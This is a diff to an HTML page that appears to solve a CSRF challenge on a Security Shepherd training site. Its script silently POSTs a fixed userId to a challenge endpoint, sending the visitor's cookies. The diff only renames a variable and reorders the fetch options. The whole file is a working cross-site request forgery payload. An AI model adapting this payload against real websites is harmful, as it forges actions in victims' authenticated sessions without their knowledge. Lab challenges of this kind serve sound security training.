--- a/csrf.html
+++ b/csrf.html
@@ -1,14 +1,13 @@
 <html><head>
 <script>
-    var formData = new FormData();
-    formData.append("userId", "8a1a261afaa67332ec17bdf95870e76c497c28a0");
-
+    var data = new FormData();
+    data.append("userId", "8a1a261afaa67332ec17bdf95870e76c497c28a0");
     fetch('https://security-shepherd.dev.inf.elasticnet.co/user/csrfchallengetwo/plusplus', {
       method: 'POST',
+      body: data,
       credentials: "include",
-      mode: "no-cors",
-      body: formData
-    })
+      mode: "no-cors"
+    });
   </script>
 </head>
 <body>
